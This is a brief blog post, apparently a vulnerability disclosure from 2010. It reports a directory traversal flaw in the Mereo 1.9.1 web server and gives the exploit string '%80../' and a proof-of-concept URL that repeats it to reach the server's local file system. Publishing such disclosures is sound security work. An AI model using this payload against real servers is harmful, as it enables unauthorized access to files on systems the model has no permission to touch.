This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 9, 2010

Mereo 1.9.1 Directory Traversal

It's possible to navigate the local file system of a server running Mereo 1.9.1 by using a specially crafted URL.

Exploit: %80../

PoC: http://localhost/%80../%80../%80../%80../%80../%80../%80../%80../
Posted by John Leitch at 7:24 PM
Labels: , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)